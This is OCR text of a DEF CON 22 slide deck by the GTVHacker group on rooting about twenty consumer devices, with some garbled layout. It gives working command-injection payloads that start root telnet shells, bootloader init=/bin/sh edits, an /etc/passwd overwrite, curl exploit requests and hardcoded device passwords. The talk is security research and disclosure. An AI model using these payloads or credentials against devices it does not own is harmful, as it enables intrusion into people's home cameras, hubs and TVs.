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GTVHacker 



• Formed to root the original 
Google TV in 2010 

• Released exploits for every 
Google TV device 

• Plus some others: 
Chromecast, Roku, Nest 

• Many more to come! 
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Speaking Members 

Amir Etemadieh ((©Zenofex) - Research Scientist at Accuvant 
LABS, founded GTVHacker 



CJ Heres (@ cj_000) - Security Researcher / Group Head, 
Technology Development [somewhere] 

Hans Nielsen (AgentHH) - Senior Security Consultant at 
Matasano 



Mike Baker ([mbm]) - Firmware developer, OpenWRT co¬ 
founder 
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Other Members 

gynophage - He's (again) running a little thing called the 
DEFCON CTF right now 



Jay Freeman (saurik) - Creator of Cydia 
Khoa Hoang (maximus64) - I 



Tom Dwenger (tdweng) - Excellent with APK reversing and 
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Why Hack ALL The Things? 


We own the hardware, why 
not the software? 

Give new life to abandoned 
hardware 

Make the product better 
We enjoy the challenge 
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Takeaways 


Learning is awesome, but this presentation is about the 




You get a root! 


• You get a root! 

• You get a root! 

Everybody gets a 
root! 
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Avenues Of Attack 



















UART 


Universal Asynchronous Receiver/Transmitter 



• Interacts with debug ports on 
board. 

• One wire for transmit (TX), one 
wire for receive (RX), one wire for 
ground 

• Work at different voltage levels, 
for example: 1.8V, 3.3V, 5V 

• Free UART adapters at the end! 
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Device 


Epson Artisan 700/800 (Printer) 



Networked all-in- 
one photo 
printer / scanner 



ARM 

!■ Linux 2.6.21-arml 
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Epson Artisan 700/800 (Printer) 
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Epson 


Booting with 
UART connected 
drops to special 
console. 

Console has root 
command 
execution as a 
feature 


fl? 


Artisan 700/800 (Printer) 

UART 


Launching Console Menu* 
«Current: WLAN mode» 


Input 


'R' 
' a' 
'm' 
'f' 

’w’ 

’s’ 


@1 

enter shell command: 


Reboot* 

Reset settings and reboot* 
display current IP address* 
display current MAC address* 
show /proc/meminfo* 
run shell command 
List current module status 
WebService status print 
statussheet output 













Belkin Wemo 
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Internet Controlled 
Wall Plug 

Multiple exploits in 
the past year 
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Belkin Wemo 






















I 

1 


i 


Device 


Belkin Wemo 


• UART was patched, according to the 
3 Internet. Not entirely true! 


| •Still accepts commands for two seconds in 

I I recovery. 

• Run this command at the right moment: 

" kiLL -9 $(ps I grep 'reboot'/sed -r -e 's/* 

“ ([0-9]+) [0-9]+/\l/ J ) 
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Greenwave Reality Smart Bulbs 





"Smart" lighting system 

Gateway plugs in and 
uses RF to 
communicate with 
bulbs 

Phillips Hue Competitor 



PowerPC Embedded 
Device 

SSH server on startup, 
password was unknown. 
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Greenwave Reality Smart Bulbs 

UART 


115200 8nl - Console Login 
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Greenwave Reality Smart Bulbs 


Device ships with an open U-Boot installation 

Root via changing U-Boot command line. 

- Connecting to UART and accessing bootloader 
shell. 

- Adding init=/bin/sh into kernel cmdline 
Now we have a root shell over our UART. 


- • To maintain access, we cracked the root 
" password: "thinkgreen". 
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File Transporter 

Advertised as "Your own 
private cloud” 

Essentially a cloud 
connected NAS 

Started on Kickstarter, 
bought by Drobo 


ARM 


Linux 2.6.35.12 
Buildroot-based userland 
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File Transporter - UART 



38400 8nl - Console Login 
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File Transporter - Open 
Bootloader 


• We can access U-Boot over the UART, allowing us to hijack the 
init process. 


• By using init=/bin/sh, we now have root access and can 
change the root password to allow login. 

FROM THE BOOTLOADER SHELL FROM THE ROOT SHELL 

setenv oldargs ${addargs} mount /proc 

setenv rootargs init=/bin/sh mem=256M passwd root 

console=ttySO,38400 rootwait user_debug=31 
setenv addargs ${rootargs} 



saveenv 
run bootdisk 
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Vizio CoStar LT (ISV-B11) 


Media Player w/ HDMI 
Passthrough 

Successor to the 
CoStar (Google TV) 

Not a GoogleTV! 
































Vizio CoStar LT (ISV-B11) 
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Vizio CoStar LT (ISV-B11) 
Hijacking Kernel Initialization 



On boot, looks for a FATB2 drive with 
either "fs.sys” or "safe-kernel.imgl”. 

“fs.sys” is a U-Boot script image which 
contains U-boot commands executed on 
boot. 



Modifying kernel command line lets us 
hijack kernel init and get root. 

Can use a combination of the two files to 
boot a new kernel entirely. 
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Device 


Staples Connect 




o «•> 


400mhz ARM SOC 
WiFi, Zigbee 
Cloud-based 



Home Automation Hub 

Rebadged Zonoff 

Linksys Branded 

Works with many 
types of HA devices 
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Staples Connect - UART 
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Staples Connect - U-Boot 



• Short out NAND pins 29/30 to ground after powering-on - 
corrupts U-Boot environment 

• Prompt timeout is set to default and allows user input! 

• Run the commands below, boots to a root console. 

setenv bootangs "console=ttyS0,115200 init=/bin/sh [...]" 

• Persistence: modify and saveenv in u-boot and/or edit /etc/ 
rc.local, add: 

# dropbear -d 222 



• SSH password is root:oemroot 
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TOSHIBA 

<?MMC 

Embedded Memory 

16GB 



eMMC 




Embedded Multi-Media Card 

• Basically an SD card on a chip. 

• Handles error correction on 
the hardware, so no fiddly 
math needed. 

• All done with cheap 
multimedia readers! 

• Can usually get pin breakouts 
from nearby resistors 
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Rooting w/ SDCard Reader/Writer 


How do you find the 
pinout? 

- Board Design (traces and 
labels) 

- Intuition 

- Logic Analyzer 

- Pull the chip and trace! 
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Amazon FireTV 

Quad Core 1.7GHz 
Snapdragon 600 

8GB EMMC Flash 





r 



FireOS 3.0 (modified 
Android 4.2.2) 
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Amazon FireTV 


EMMC Pinout 


UART Pinout (1.8V) 
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Hisense Android TV (Google TV) 


Hisense 


Marvell MV88DE3108 
Quad Core CPU 
Android 4.2.2 


A newer SOC compared to last year. 

At DEF CON 21 we demonstrated how to 
bypass secure boot on the entire SOC family 
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Rumiuraii 


Hisense Android TV (Google TV) 



Mount the "factory_setting" partition. 

- /dev/mmcblk0p3 

- Persists between boots. 



# chmod 4755 su 
- Could also use SuperSu or similar. 
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Pro Tip - Don't say: 

“[X] has never been hacked” 




"A refrigerator has never been 
hacked." - USPS 
https://youtu.be/HiWjfWb3bNc 


US Postal Service is at 
the forefront of 
refrigerator security. 

Took this as a challenge. 

Got parts, as it's a 
$3000 refrigerator. 
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LG Smart Refrigerator 
(UFX31995ST) 

Android 2.3 


Brains of the fridge 
Controls ice, 
compressor, water 


WiFi, USB, SD Card 
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LG Smart Refrigerator 
(LFX31995ST) 













UART - Boots to 
root console! 

EMMC - Success. 
Mount system, 
insert stock 
Android launcher 
and superuser 
binary. 

ro.secure=0, device 
already has su. 
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Command Injection 


• User input can't be trusted. 

^ • Don't use shell commands. 

• Never trust user input. 

• At least escape your shell commands. 
I • systemQ counts too. 


B • "Is %s" with the parameter ";reboot;" gives 
■■ "Is ;reboot;", causing a reboot. 
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Vizio Smart TVs (VF552XVT) 





BCM97XXX-based Yahoo 
Powered Smart TV 

Platform is still widely 
available 


One of the last full array backlit LED TVs. 


e Smartness is thin, the TV isn't. 
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Vizio Smart TVs (VF552XVT) 


VIZIO n 

4 Connect to Access Point 

WPA AES 

Please enter your WPA Pre shared 
key 


Connect _ 

Show Keyboard 


ft so O x o 



Cl via WiFi password - spawns 
a shell over a USB UART. 

• Enter this: 

;mknod /tmp/gtvhacker c 188 0; 

• Then this: 

;bash 2>/tmp/gtvhacker>/tmp/ 

gtvhacker</tmp/gtvhacker; 

bash; 
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Sony BDP-S5100 (Blu-Ray Player) 


Blu-Ray Player 
MTK8500 Chipset 


Runs Linux 

WiFi, Netflix, VUDU, etc 
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LG BP5B0 (Blu-Ray Player) 


^ Blu-Ray Player 
1 MTK8500 Chipset 



■ WiFi, Netflix, VUDU, etc. 
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LG BP530 / Sony BDP-S5100 
(Blu-Ray Players) 


• Bug in the MTK supplied SDK, many players 
affected! 

• Put an empty file named "vudu.txt" in a folder 
named "vudu" on a flash drive. 

1 • Also create a “vudu.sh” containing: 

I mount -t overlayfs -o overlayfs /etc/passwd 

echo "root::0:0:root:/root:/bin/sh" > /etc/passwd 
/mnt/rootfs_normal/usr/sbin/telnetd 

■■ • Once VUDU is run, it’ll execute the shell script as 
■" root, and you can connect via Telnet. 



http://DC22.GTVHACKER.COM 




♦: 


Ml ’ 

Mi kVxj 










Device 

"1 13 


i 

-i 

si 

f. 




Panasonic DMP-BDT230 (Blu-Ray) 


Blu-Ray Player 
MTK8500 Chipset 



Runs Linux 

WiFi, Netflix, VUDU, etc 
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Panasonic DMP-BDT230 (Blu- 


115200 8nl- Console Output 
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Panasonic DMP-BDT230 


Network 
folder name 
isn’t 

sanitized 
prior to use. 

Injected 
commands 
run as root. 


Network Drive List 


Network Drive Settings 


Enter the following items and select "Connect to 
access a network drive. 


IP Address 


$(/mnt/sdta1/busybox teln 


Shared Folder Name 


User ID 


Password 


Connect 
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Motorola RAZR LTE Baseband 


Baseband is isolated 
from main CPU - totally 
separate piece of 
hardware. 

Controls all cell network 
communications. 

Also runs an ARM 
processor with Linux. 
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Motorola RAZR LTE Baseband 





-i 



sa 



• Baseband listens on an internal network, 
limited shell accessible on port 3023, 
diagnostic script on 3002. 

• As seen in said script: AWK injection! 

- busybox awk '{print substr("'"$ 
{outFilePath}" 



• Lets us get a root shell on the baseband. 


- x",0,l);system( M . 
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PogoPlug Mobile 


Online backup / 
cloud storage, < $10 

Plug in USB drive / 

SD card, auto-upload 
to the cloud 


Marvell Feroceon 
ARM SOC 

Linux 2.6.31.8 
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PogoPlug - UART 




115200 8nl - Open Bootloader & Root Shell 
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PogoPlug Mobile 
Command Execution 

/sqdiag/HBPlug 


Cloud Engines 


CloudEngines Diagnostics : HBPlug 


BGQueue 

EM-MAIN 

EM-SVC 

HBPlug 

HOTPLUG 

Logging 

SVCMUX 

SVCTable 

SYNC 

TCP-MAIN 

TCP-SVC 

Threadpool 


I HBPlug Diagnostics 
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PogoPlug Mobile 
Command Execution 

/sqdiag/HBPIug?action=command 


Cloud Engines 


CloudEngines Diagnostics : HBPlug 


BGQueue 

f HBPlug Diagnostics 

EM-MAIN 

Execute Command 

EM-SVC 

HBPlug 



HOTPLUG 

Logging 

SVCMUX 

SVCTable 

SYNC 

TCP-MAIN 

TCP-SVC 

Threadpool 



curl -k "https://root:ceadmin@IP_ADDR/sqdiag/HBPIug? 
action=command&command=reboot M 
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Netgear Push2TV (PTVBOOO) 



PureVu CNW6611L 
Secure Media SOC 


Screen Sharing Device 

• Miracast 

• Intel WiDi 











Netgear Push2TV - UART 
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Netgear Push2TV (PTVBOOO) 






-I 



-3 



Via UART, press space at boot to interrupt 
uboot - run your own commands. 

UART again, root console is active for 2-3 
seconds after booting. 

Command injection in web interface via box 
nickname - command will run as root. 

SPI flash chip holds uboot commands, can be 
reflashed to run custom ones. 
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Ooma Telo 



VOIP Router 

Running OpenWRT based 
distro With Freeswitch 

Assists in connecting to 
Ooma Network for VOIP 
Calls 



ARM processor 


p Linux 2.6.33.5 










Ooma Telo - UART 



iJfM'SIIIMflli; 1 ; 


Projec 


R1347o 


115200 8nl - Console Login 
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Ooma Telo - Cl in Web Portal 



• SSH already running! 

• Need to add SSH port to iptables so we can access 
it. 

• Command injection in the Ooma Telo Portal. 

• No sanitization done on Server IP before running 
a command on the backend. 

• Root password is "!oomal23", password crackers 
are fun. 

• By default page is only accessible through LAN. 









Ooma Telo - Cl in Web Portal 


Ooma Telo 


Version: 86988 




^ Wireless 
_ J Home Network 
• = Advanced 
J' Ringtones 
(< A° DECT 
^ Bluetooth 
| Status 


$ Tools 


Bandwidth 


Bandwidth Measurement Tool ? 

Iperf Server Details 


Server IP Address 

Port 

Protocol 

Time Duration (sec) 
Run Test 


x.com$(iptables -t filter -A LAN SSH -j ACCEPT) 


• Command 
1 Injection 


TCP S 


Port Scan 



DNS Test 








Support My Ooma 

Copyright © 2012 Ooma, Inc. All rights reserved 


Enable SSH on LAN: 

x.com $(iptables -t filter -A LAN_SSH -j ACCEPT) 
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Netgear NTV200-100NAS 



Media Streaming 
Device 

Adobe Flash-based 
S10-S0 (cheap!) 


WiFi 


Secure Broadcom SOC 
Encrypted updates 
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Netgear NTV200-100NAS 
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Netgear NTV200-100NAS 



Updates are signed and encrypted 

App installation isn’t, and is done over unencrypted 
HTTP. 

Man-in-the-middle the app installation! 

- Grab a copy of an app 

- Add a malicious symlink 

- Repack and host app locally 

- Run the app 

- Modify the app again, this time adding a shell script inside 
the symlink to call telnet 

Run the app again, reboot, and now you have persistent 4 
root! 




CF~Z 


http://DC22.GTVHACKER.COM 

n 






1 











1 

1 


Device 

19 



ASUS Cube (Google TV) 




Marvell 88de3100 SOC 
Dual Core 1.2GHZ ARM 
Google TV! 


We released CubeRoot for the Cube and 
additional exploits for the the Marvell SOC 
(secure boot) at DEF CON 21. 
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ASUS Cube (Google TV) 


Built-in Media app can mount SMB shares 
(Windows file sharing) with no restrictions. 

Root procedure: 

- Create a SMB share with a su binary. 

- Use the media app to connect to the SMB share. 

- adb into the Cube, run the su binary - you are 
root! 

- From here, remount system, install SuperSu and 
win. 
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Summer Baby Zoom WiFi 



WiFi baby monitor 
Custom RF for remote 
Marketed as “Secure” 



Summer Link 

Summer Infant ■ April 19,201' 

Media & Video 


Installed 


0 This app is compatible with some of your devices. 

★ ★ 1 1152) g+1 +83 Recommend this on Google 
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j ce Summer Baby Zoom WiFi 
Hardcoded Username & Password 

Found this interesting base64 encoded string and function 
calls in "snapcam" binary 


addiu $a1, (afxndqgrtmw4hok - OX4EOO00) # aa fXNDQGRtMU4hdkF1dGgzbnQxV0BUNw== aa 
addiu $a2, $sp, 0x18 

la $t9, ZNSsCIEPKcRKSalcE tt std: istring: :string(char const*,std::allocator< 

nop 

jalr $t9 ; std:istring: :string(char const*,std::allocator<char> const&) # std: 
addiu $a0, $sp, 0x20 

lw $gp, 0x1 0($sp) 

li $u0, 6 

sw $u0, 0x34($sp) 

la $t9, _ZN6Gentek14setEncUserPassESs tt Gemtek::setEncUserPass(std:istring) 

lw $a0, 0x64($sp) 

jalr $t9 ; Gemtek::setEncUserPass(std::string) # Gemtek::setEncUserPass(std::s 

• — tt*- — — — — Ir — r — — ir — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — • 


MsC@dmln!:Auth3ntlc@T3 
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Summer Baby Zoom WiFi 
Hardcoded Username & Password 


• Calling "nvram show" from 
the command line produces 
the following list of users 

• 2 of the users have 
passwords that change 
between each cam 

• Also note the pass seen 
hardcoded in the snapcam 
binary. 


UserSetSetting.userList.users0.password=PFCCLALLDBBR 
UserSetSetting.userList.users0.privilege=0 
JserSetSetting.userList.users0.username=V13w3r 
UserSetSetting.user List.usersl.index=3 
UserSetSetting.userList.usersl.password=Auth3ntlc@T3 
UserSetSetting.userList.usersl.privileged 
UserSetSetting.userList.usersl.usernane=MsC@dmln! 
UserSetSetting.userList.users2.index=4 
UserSetSetting.userList.users2.password=PFCCLALLDBBR 
UserSetSetting.userList.users2.privileged 
UserSetSetting.userList.users2.username=SnApAdmln 

Users and passwords on camera from 
"nvram show" 
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Summer Baby Zoom WiFi 
Command Execution 


SystemGT.cgi 
accessible with 
admin credentials 
"SystemGT" POST 
var gets directly 
executed with 
system () as root 


B \si\ 

T 

la 

$a1, 0x430000 

la 

$t9, sprintf 

addiu 

$s0, $sp, 0x200+uar 168 

addiu 

$a1, (aS_0 - 0x430000) It “%s & " 

moue 

$a0 f $s0 It SystemGT Post Uar 

jalr 

addiu 

$t9 ; sprintf 

$a2, $sp, 0x200+uar_1E8 

lw 

$gp, 0x200+uar_1F0($sp) 

nop 

$t9, system 

la 

nop 

$t9 ; system 

jalr 

moue 

$a0, $s0 It SystemGT cmd 

lw 

$gp, 0x200+uar 1F0($sp) 

b 

loc 41C9D4 

nop 




/bin/mini_httpd for "SystemGT.cgi" 



curl -u 'MsC@dmln!:Auth3ntlc@T3' "http://IP/cgi 
bin/systemGT.cgi" -d "systemGT=telnetd" 
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This is DEF CON 22, right? 
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Samsung SmartCam 




a 
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m 



SAMSUNG 


Tl DaVinci ARM SOC 
Linux 2.6.18 


• Network camera w/ mic 
and speaker. 

• Mobile phone app for 
remote access. 

• Web interface for local 
access. 












Samsung SmartCam - UART 


GND 


RX 


TX 


VCC 


115200 8nl - Console Logging Only 
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Samsung SmartCam - PreAuth 







}else if($pageData[0] == "NEW"){ 

$result = requestToCamera(CMD_USER, ACTION_GET_ALL, TYPE_REQUEST, null); 
if($result[0] == "OK" && $result[l] != null){ 

$recvData = $result[l]; 

$sendData = array_slice($recvData, 0, 40); 


str2byte($sendData, $pageData[l], 17, 16); 

requestToCamera(CMD_USER, ACTION_SET, TYPEREQUEST, $sendData); 
$_SESSION["PRIVATE_KEY"] = $pageData[l]; 
echo "OK"; 

}else{ 

echo "NOK;" . $result[l]; 

} 

} 



► 


CGI script normally does auth check, but not on new user 
Can reset admin password without knowing the user's password 
Only accessible over the LAN 
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Samsung SmartCam - Cl 



• WEP key is not sanitized for shell commands. 


| • Set up a WEP key with an injected command, 
'i then re-attach a network cable to trigger the 

3 bug. 

t 

I * Can also be exploited without any physical 
access if the device is connected over WiFi. 



M • Web interface runs as root! 
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Samsung SmartCam - Cl 


5 General Setting 

'r? Network Setting 

Wired Network 

Wireless Network 

0 Time Setting 


O Setup 

Wireless Network 


SmarT 



XI 


® Wireless On Q Wireless Off 


Wireless Network Name(SSID) 

Protected 

Signal 


1 

.itlO 


1 

o.llO 


1 

..llfl 


1 

.lllfl 


Other WiFi Networks 

Security Q None 

® WEP O WPA/WPA2 PSK 



Network SSID 
Password 


: HACKALLTHETHINGS 
: $(busybox telnetd -l/bin/sh) 


ICommand 

Injection 


SAMSUNG TECHW1N 


Enable root telnetd: $(busybox telnetd -l/bin/sh) 


http://DC22.GTVHACKER.COM 



































BlueTooth, WiFi, Zwave 
and Zigbee 

Tl CC1101 (RF SDR) 

Great cheap "RF Toolkit 
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Wink Hub 

• Smart home "gateway" 

• Allows integration with 
multiple smart home 
devices. 

• Mobile application to 
control ALL THE THINGS 
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Wink Hub 
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Wink Hub - Command Injection 


<?php 

$nodeId = $_POST[ ’nodeld' ] ; 

Sattrld = $_POST[ 'attrld' ] ; 

$v = $_POST[ 'value' ]; 

//$who = exec('whoaml'); 

//echo $who; 

//passthru("sudo Is”, $retval); 

//echo "nodeId=" .$nodeId . " attrld=" . $attrld . " value=" 
$cmd = 'sudo ' . dlrname(_FILE_ ) . '/php2apron set_value ' 

//echo $cmd . " 

passthru($cmd , $retval); 
echo "ret_code=" . $retval; 


?> 


$v; 

$nodeId 


$attrld 




The "set_dev_value.php" script doesn't shell-escape the 

POST fields "nodeld" and "attrld" 

• Used in a command with "sudo" 
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Demo 


4 minutes, 22 devices, 1 special guest 
Welcome DUAL CORE! 

"All The Things" 

Dual Core CDs available in the vendor area 
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Questions 




n 


We'll be doing a Q&A after the talk at the 

Chillout Lounge 

http://DC22.GTVHACKER.COM 
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WIKI: http://www.GTVHacker.com 


V 




Ikfc&Ss 

Thank You 

Slide resources can be found at: 
htt p://DC22.GTVHacker.com/ 




FORUM: 

http://forum.GTVHacker.com 
BLOG: http://bloq.GTVHacker.com 
IRC: irc.freenode.net #GTVHacker 
Follow us on Twitter: @GTVHacker 
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Shoutout to: 
DEFCON 
Dual Core 
ddggttff3 
radix 
minga 
OxOOstring 

And all of you! 

O 7 , 
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